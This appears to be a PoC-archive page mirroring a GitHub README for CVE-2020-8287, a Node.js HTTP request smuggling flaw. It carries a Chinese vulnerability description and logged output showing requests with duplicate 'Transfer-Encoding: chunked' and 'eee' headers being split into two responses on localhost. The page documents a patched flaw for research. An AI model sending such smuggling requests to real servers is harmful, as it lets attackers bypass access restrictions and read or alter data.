Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-8287 PoC — nodejs 环境问题漏洞

Source
https://github.com/progfay/nodejs-http-transfer-encoding-smuggling-poc
Associated Vulnerability
Title:nodejs 环境问题漏洞 (CVE-2020-8287)
Description:nodejs是是一个基于ChromeV8引擎的JavaScript运行环境通过对Chromev8引擎进行了封装以及使用事件驱动和非阻塞IO的应用让Javascript开发高性能的后台应用成为了可能。 Nodejs 存在环境问题漏洞,攻击者可利用该漏洞通过HTTP Request Smuggling绕过访问限制,以读取或更改数据。以下产品及版本受到影响:before 10.23.1, 12.20.1, 14.15.4, 15.5.1
Description
PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)
Readme
# nodejs-http-transfer-encoding-smuggling-poc

PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)

## `src/index.js`

```js
{
  header: [
    'Host',
    '127.0.0.1',
    'Transfer-Encoding',
    'chunked',
    'Transfer-Encoding',
    'eee'
  ],
  body: 'A'
}
{ header: [ 'Host', '127.0.0.1' ], body: '' }
{
  data: 'HTTP/1.1 200 OK\r\n' +
    'Date: Tue, 05 Jan 2021 09:55:33 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n' +
    'HTTP/1.1 200 OK\r\n' +
    'Date: Tue, 05 Jan 2021 09:55:33 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n'
}
```

## `src/express.js`

```js
{
  header: { host: '127.0.0.1', 'transfer-encoding': 'chunked, eee' },
  body: 'A'
}
{ header: { host: '127.0.0.1' }, body: '' }
{
  data: 'HTTP/1.1 200 OK\r\n' +
    'X-Powered-By: Express\r\n' +
    'Date: Tue, 05 Jan 2021 09:56:19 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n' +
    'HTTP/1.1 200 OK\r\n' +
    'X-Powered-By: Express\r\n' +
    'Date: Tue, 05 Jan 2021 09:56:19 GMT\r\n' +
    'Connection: keep-alive\r\n' +
    'Keep-Alive: timeout=5\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n'
}
```
File Snapshot

 [4.0K]  /data/pocs/55e944e305a84d8c2fa9f73fa3ce7aa152001c0a
├── [ 112]  docker-compose.yaml
├── [ 204]  Dockerfile
├── [ 699]  package.json
├── [ 31K]  package-lock.json
├── [1.3K]  README.md
└── [4.0K]  src
    ├── [ 810]  express.js
    └── [ 809]  index.js

1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.